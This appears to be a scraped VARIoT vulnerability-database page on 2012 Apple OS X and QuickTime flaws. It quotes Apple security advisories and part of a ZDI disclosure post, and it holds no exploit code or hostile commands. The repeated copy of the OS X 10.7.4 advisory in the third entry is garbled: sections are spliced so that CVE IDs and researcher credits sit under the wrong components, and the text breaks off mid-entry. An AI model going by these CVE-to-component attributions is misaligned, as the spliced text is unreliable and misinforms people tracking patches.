VARIoT IoT vulnerabilities database

libsecurity in Apple Mac OS X before 10.7.4 does not properly restrict the length of RSA keys within X.509 certificates, which makes it easier for remote attackers to defeat cryptographic protection mechanisms by conducting a spoofing or network-sniffing attack during communication with a site that uses a short key. Apple Mac OS X is prone to an information-disclosure vulnerability. Attackers can leverage this issue to gain access to sensitive information. Information obtained may aid in further attacks. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002 OS X Lion v10.7.4 and Security Update 2012-002 is now available and addresses the following: Login Window Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3 Impact: Remote admins and persons with physical access to the system may obtain account information Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. CVE-ID CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State University, Paul Nelson Bluetooth Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A local user may be able to execute arbitrary code with system privileges Description: A temporary file race condition issue existed in blued's initialization routine. CVE-ID CVE-2012-0649 : Aaron Sigel of vtty.com curl Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. curl disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling empty fragments. CVE-ID CVE-2011-3389 : Apple curl Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Using curl or libcurl with a maliciously crafted URL may lead to protocol-specific data injection attacks Description: A data injection issue existed in curl's handling of URLs. This issue is addressed through improved validation of URLs. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0036 Directory Service Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: A remote attacker may obtain sensitive information Description: Multiple issues existed in the directory server's handling of messages from the network. By sending a maliciously crafted message, a remote attacker could cause the directory server to disclose memory from its address space, potentially revealing account credentials or other sensitive information. This issue does not affect OS X Lion systems. The Directory Server is disabled by default in non-server installations of OS X. CVE-ID CVE-2012-0651 : Agustin Azubel HFS Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Mounting a maliciously crafted disk image may lead to a system shutdown or arbitrary code execution Description: An integer underflow existed in the handling of HFS catalog files. CVE-ID CVE-2012-0642 : pod2g ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF files. This issue does not affect OS X Lion systems. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-2692 CVE-2011-3328 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue is addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 Kernel Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: When FileVault is used, the disk may contain unencrypted user data Description: An issue in the kernel's handling of the sleep image used for hibernation left some data unencrypted on disk even when FileVault was enabled. This issue is addressed through improved handling of the sleep image, and by overwriting the existing sleep image when updating to OS X v10.7.4. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3212 : Felix Groebert of Google Security Team libarchive Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in the handling of tar archives and iso9660 files. CVE-ID CVE-2011-1777 CVE-2011-1778 libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Verifying a maliciously crafted X.509 certificate, such as when visiting a maliciously crafted website, may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of X.509 certificates. CVE-ID CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme Prado of Conselho da Justica Federal, Ryan Sleevi of Google libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Support for X.509 certificates with insecure-length RSA keys may expose users to spoofing and information disclosure Description: Certificates signed using RSA keys with insecure key lengths were accepted by libsecurity. This issue is addressed by rejecting certificates containing RSA keys less than 1024 bits. CVE-ID CVE-2012-0655 libxml Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted web page may lead to an unexpected application termination or arbitrary code execution Description: Multiple vulnerabilities existed in libxml, the most serious of which may lead to an unexpected application termination or arbitrary code execution. These issues are addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla LoginUIFramework Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: If the Guest user is enabled, a user with physical access to the computer may be able to log in to a user other than the Guest user without entering a password Description: A race condition existed in the handling of Guest user logins. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0656 : Francisco Gomez (espectalll123) PHP Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Multiple vulnerabilities in PHP Description: PHP is updated to version 5.3.10 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-4566 CVE-2011-4885 CVE-2012-0830 Quartz Composer Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A user with physical access to the computer may be able to cause Safari to launch if the screen is locked and the RSS Visualizer screen saver is used Description: An access control issue existed in Quartz Composer's handling of screen savers. This issue is addressed through improved checking for whether or not the screen is locked. CVE-ID CVE-2012-0657 : Aaron Sigel of vtty.com QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file during progressive download may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of audio sample tables. CVE-ID CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of MPEG files. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: A buffer underflow existed in the handling of MPEG files. CVE-ID CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability Research QuickTime Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of JPEG2000 encoded movie files. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-1004 CVE-2011-1005 CVE-2011-4815 Samba Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: If SMB file sharing is enabled, an unauthenticated remote attacker may cause a denial of service or arbitrary code execution with system privileges Description: Multiple buffer overflows existed in Samba's handling of remote procedure calls. By sending a maliciously crafted packet, an unauthenticated remote attacker could cause a denial of service or arbitrary code execution with system privileges. These issues do not affect OS X Lion systems. CVE-ID CVE-2012-0870 : Andy Davis of NGS Secure CVE-2012-1182 : An anonymous researcher working with HP's Zero Day Initiative Security Framework Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. CVE-ID CVE-2012-0662 : aazubel working with HP's Zero Day Initiative Time Machine Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A remote attacker may access a user's Time Machine backup credentials Description: The user may designate a Time Capsule or remote AFP volume attached to an AirPort Base Station to be used for Time Machine backups. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. X11 Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Applications that use libXfont to process LZW-compressed data may be vulnerable to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libXfont's handling of LZW-compressed data. This issue is addressed by updating libXfont to version 1.4.4. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. OS X Lion v10.7.4 and Security Update 2012-002 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. For OS X Lion v10.7.3 The download file is named: MacOSXUpd10.7.4.dmg Its SHA-1 digest is: 04c53a6148ebd8c5733459620b7c1e2172352d36 For OS X Lion v10.7 and v10.7.2 The download file is named: MacOSXUpdCombo10.7.4.dmg Its SHA-1 digest is: b11d511a50d9b728532688768fcdee9c1930037f For OS X Lion Server v10.7.3 The download file is named: MacOSXServerUpd10.7.4.dmg Its SHA-1 digest is: 3cb5699c8ecf7d70145f3692555557f7206618b2 For OS X Lion Server v10.7 and v10.7.2 The download file is named: MacOSXServerUpdCombo10.7.4.dmg Its SHA-1 digest is: 917207e922056718b9924ef73caa5fcac06b7240 For Mac OS X v10.6.8 The download file is named: SecUpd2012-002Snow.dmg Its SHA-1 digest is: 9669fbd9952419e70ac20109cf4db37f9932e9f8 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-002.dmg Its SHA-1 digest is: 34da2dcbc8d45362f1d5e3b1b218112a729ae1c3 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.16 (Darwin) iQEcBAEBAgAGBQJPqtkzAAoJEGnF2JsdZQeee2MIAKAcBIY6k0LU2fDLThFoAgKh WkYpGmCwa7L6n02geHzWrUCK/P/0yGWzDDqLfKlKuKbXdEIRP2wZTlvrqZHLzNO/ nXgz3HN1Xbll8yVXrGMEsoTD23Q+2/ZKLGMlSDw3vgBTVi/g4Rcer4Eew5mTkaoA j4WkrzgVUIxCMrsWMMwu1SVaizBuTYbNVzCzV3JPF1H0zVtVKgwWjhTdOJ/RDksD sjZG1XIEqVyv1rNk5BtjxVPFaJGpf9mcHiH8XyKQ0bC6ToM2r3B++Layoc5k1K0V OxKGSfWOEbWi/KR6vlXyVbe7JnU7a/V0C25HXhnoMEtoTCleZACEByLVtBC87LU= =6Eiz -----END PGP SIGNATURE-----

Integer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted MPEG file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within how the application calculates the padding for an MPEG sample. When calculating the padding, the MPEG library will subtract this from another length without checking for underflow. This resulting length will then be used in a memcpy operation into a statically sized buffer allocated on the heap. This can lead to code execution under the context of the application. Apple Mac OS X is prone to an integer-overflow vulnerability that affects the QuickTime component. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-15-1 QuickTime 7.7.2 QuickTime 7.7.2 is now available and addresses the following: QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: Multiple stack overflows existed in QuickTime's handling of TeXML files. These issues do not affect OS X systems. CVE-ID CVE-2012-0663 : Alexander Gavrun working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A heap overflow existed in QuickTime's handling of text tracks. This issue does not affect OS X systems. CVE-ID CVE-2012-0664 : Alexander Gavrun working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A heap buffer overflow existed in the handling of H.264 encoded movie files. CVE-ID CVE-2012-0665 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Opening a maliciously crafted MP4 encoded file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access issue existed in the handling of MP4 encoded files. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.3. CVE-ID CVE-2011-3458 : Luigi Auriemma and pa_kt both working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An off by one buffer overflow existed in the handling of rdrf atoms in QuickTime movie files. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.3. CVE-ID CVE-2011-3459 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file during progressive download may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of audio sample tables. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.4. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.4. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in the QuickTime plugin's handling of QTMovie objects. This issue does not affect OS X systems. CVE-ID CVE-2012-0666 : CHkr_D591 working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Processing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of PNG files. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.3. CVE-ID CVE-2011-3460 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted QTVR movie file may lead to an unexpected application termination or arbitrary code execution Description: A signedness issue existed in the handling of QTVR movie files. This issue does not affect OS X systems. CVE-ID CVE-2012-0667 : Alin Rad Pop working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A use after free issue existed in the handling of JPEG2000 encoded movie files. This issue does not affect systems prior to OS X Lion. For OS X Lion systems, this issue is addressed in OS X Lion v10.7.4. CVE-ID CVE-2012-0661 : Damian Put working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of RLE encoded movie files. CVE-ID CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in QuickTime's handling of Sorenson encoded movie files. This issue does not affect OS X systems. CVE-ID CVE-2012-0669 : Damian Put working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in QuickTime's handling of sean atoms. CVE-ID CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft) working with HP's Zero Day Initiative QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted .pict file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of .pict files. CVE-ID CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the Qualys Vulnerability & Malware Research Labs (VMRL) QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Opening a file in a maliciously crafted path may lead to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in QuickTime's handling of file paths. This issue does not affect OS X systems. CVE-ID CVE-2012-0265 : Tielei Wang of Georgia Tech Information Security Center via Secunia SVCRP QuickTime Available for: Windows 7, Vista, XP SP2 or later Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer underflow existed in QuickTime's handling of audio streams in MPEG files. CVE-ID CVE-2012-0660 : Justin Kim at Microsoft and Microsoft Vulnerability Research (MSVR) QuickTime 7.7.2 may be obtained from the QuickTime Downloads site: http://www.apple.com/quicktime/download/ The download file is named: "QuickTimeInstaller.exe" Its SHA-1 digest is: ed569d62b3f8c24ac8e9aec7275f17cbb14d2124 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.18 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJPsobhAAoJEPefwLHPlZEwk/sP/0C8iXVhnG481GbA03CMhKXJ XDooIlCG6YeoeJxGfri/vqlzqcHe3R90K6R89z1dKGU2bWGvtITh95E+WKll++7F hHYq6YC+r/o1cP1SjBi6A3swhN57m1nQZRIEnnIm+nBSxaiHA6xdRSUaK4ighLSA jbOVfu/6NPuGSlgWBPKSISDY2FhL0GH0QVLW/piVtMTrxhizlE7dgieipAPoVvRC SW2W0te7ujo2X167f2GS8EwplUkj/yVeScdr/6HjLkAXIQ1B9RNqTeOdyQZjTxay 32xhZTQ+JfSQzY6VSGoF0bqlK39u5UyzySIKS446OxclYI6xGKSFvTN3nBUwERd+ W+E/4k3Ry4OYEkgZ5yltXO8bJvGZtmpLOkq94Vb4w7EaEgJ452J/YjqCEEbmtAKM 0W9g1jt5av5Hv+vQ7rufR1tJ6CqkIDDr0f3qY+W/F8ZtdA8Bkvm9568d3L1Vlbai zy89w39Z1RTPMLccZEhtd+80f75P+R3n88X5czjXYignrUJbxhM/S8meqQB5GUB9 nJvZtWB1wlACHJ/EKUTv6miK20XE1OukRyvW0o7WWplqBj5KFWvRcV0tovfybGY9 EKwmao4Hwmq+ovJBFLZj/TV6MMxsJjS9qVea/yOlzZCy+6dwok38yyMAqy+m2dLT X2aq0dgzK7qjPx0FRyOx =BPXs -----END PGP SIGNATURE----- . - -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT5261 - -- Disclosure Timeline: 2011-10-21 - Vulnerability reported to vendor 2012-06-06 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * Anonymous * pa_kt / twitter.com/pa_kt / e1c14ba6 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT8/PmVVtgMGTo1scAQLKYQgAgqkAX7DnpsYwdzaYJ2Ww1JLCpU7/ilF+ 5S5RwPLiDPtVY79givOAZkpee9+/b5vZd7AKwWJNK2GxXhpMLvXCtn3ODb36eQhf lTlxB8KTsz+jXndo5qbRa6306aug8/PFSAZyVX9shp0/IuIPgScCKAKqoM1NUqRY rfTHfxXWIwinDlcmR8FKy9Dni6BoiRjPJGwuzGLL2ThpFrt3M4fFgXei8lqM3Zdv BWAqzPSXClRbWOQWeIiQW5ObAk0z8E+dbHgNd0XYCTp6sSgIncy/LxEMypLeqhEw UD4kMxZ6exNWCpheDTac6VokNk1Fqt4a817BH1zE4es8t9A3JhVi0Q== =sEem -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

libsecurity in Apple Mac OS X before 10.7.4 accesses uninitialized memory locations during the processing of X.509 certificates, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted certificate. Apple Mac OS X is prone to a remote memory corruption vulnerability that affects the 'libsecurity' component. Successful exploits may allow attackers to execute arbitrary code in the context of the currently logged-in user; failed exploit attempts may cause denial-of-service conditions. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2012-05-09-1 OS X Lion v10.7.4 and Security Update 2012-002 OS X Lion v10.7.4 and Security Update 2012-002 is now available and addresses the following: Login Window Available for: OS X Lion v10.7.3, OS X Lion Server v10.7.3 Impact: Remote admins and persons with physical access to the system may obtain account information Description: An issue existed in the handling of network account logins. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. This issue only affects systems running OS X Lion v10.7.3 with users of Legacy File Vault and/or networked home directories. CVE-ID CVE-2012-0652 : Terry Reeves and Tim Winningham of the Ohio State University, Markus 'Jaroneko' Raty of the Finnish Academy of Fine Arts, Jaakko Pero of Aalto University, Mark Cohen of Oregon State University, Paul Nelson Bluetooth Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A local user may be able to execute arbitrary code with system privileges Description: A temporary file race condition issue existed in blued's initialization routine. CVE-ID CVE-2012-0649 : Aaron Sigel of vtty.com curl Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. curl disabled the 'empty fragment' countermeasure which prevented these attacks. This issue is addressed by enabling empty fragments. CVE-ID CVE-2011-3389 : Apple curl Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Using curl or libcurl with a maliciously crafted URL may lead to protocol-specific data injection attacks Description: A data injection issue existed in curl's handling of URLs. This issue is addressed through improved validation of URLs. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0036 Directory Service Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: A remote attacker may obtain sensitive information Description: Multiple issues existed in the directory server's handling of messages from the network. By sending a maliciously crafted message, a remote attacker could cause the directory server to disclose memory from its address space, potentially revealing account credentials or other sensitive information. This issue does not affect OS X Lion systems. The Directory Server is disabled by default in non-server installations of OS X. CVE-ID CVE-2012-0651 : Agustin Azubel HFS Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Mounting a maliciously crafted disk image may lead to a system shutdown or arbitrary code execution Description: An integer underflow existed in the handling of HFS catalog files. CVE-ID CVE-2012-0642 : pod2g ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in ImageIO's handling of CCITT Group 4 encoded TIFF files. This issue does not affect OS X Lion systems. Further information is available via the libpng website at http://www.libpng.org/pub/png/libpng.html CVE-ID CVE-2011-2692 CVE-2011-3328 ImageIO Available for: Mac OS X v10.6.8, Mac OS X Server v10.6.8 Impact: Viewing a maliciously crafted TIFF file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in libtiff's handling of ThunderScan encoded TIFF images. This issue is addressed by updating libtiff to version 3.9.5. CVE-ID CVE-2011-1167 Kernel Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: When FileVault is used, the disk may contain unencrypted user data Description: An issue in the kernel's handling of the sleep image used for hibernation left some data unencrypted on disk even when FileVault was enabled. This issue is addressed through improved handling of the sleep image, and by overwriting the existing sleep image when updating to OS X v10.7.4. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2011-3212 : Felix Groebert of Google Security Team libarchive Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Extracting a maliciously crafted archive may lead to an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in the handling of tar archives and iso9660 files. CVE-ID CVE-2012-0654 : Dirk-Willem van Gulik of WebWeaving.org, Guilherme Prado of Conselho da Justica Federal, Ryan Sleevi of Google libsecurity Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Support for X.509 certificates with insecure-length RSA keys may expose users to spoofing and information disclosure Description: Certificates signed using RSA keys with insecure key lengths were accepted by libsecurity. This issue is addressed by rejecting certificates containing RSA keys less than 1024 bits. These issues are addressed by applying the relevant upstream patches. CVE-ID CVE-2011-1944 : Chris Evans of Google Chrome Security Team CVE-2011-2821 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-2834 : Yang Dingning of NCNIPC, Graduate University of Chinese Academy of Sciences CVE-2011-3919 : Juri Aedla LoginUIFramework Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: If the Guest user is enabled, a user with physical access to the computer may be able to log in to a user other than the Guest user without entering a password Description: A race condition existed in the handling of Guest user logins. This issue does not affect systems prior to OS X Lion. CVE-ID CVE-2012-0656 : Francisco Gomez (espectalll123) PHP Available for: OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Multiple vulnerabilities in PHP Description: PHP is updated to version 5.3.10 to address several vulnerabilities, the most serious of which may lead to arbitrary code execution. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2011-4566 CVE-2011-4885 CVE-2012-0830 Quartz Composer Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: A user with physical access to the computer may be able to cause Safari to launch if the screen is locked and the RSS Visualizer screen saver is used Description: An access control issue existed in Quartz Composer's handling of screen savers. This issue is addressed through improved checking for whether or not the screen is locked. CVE-ID CVE-2012-0657 : Aaron Sigel of vtty.com QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted movie file during progressive download may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of audio sample tables. CVE-ID CVE-2012-0658 : Luigi Auriemma working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.3, OS X Lion Server v10.7 to v10.7.3 Impact: Viewing a maliciously crafted MPEG file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the handling of MPEG files. CVE-ID CVE-2012-0659 : An anonymous researcher working with HP's Zero Day Initiative QuickTime 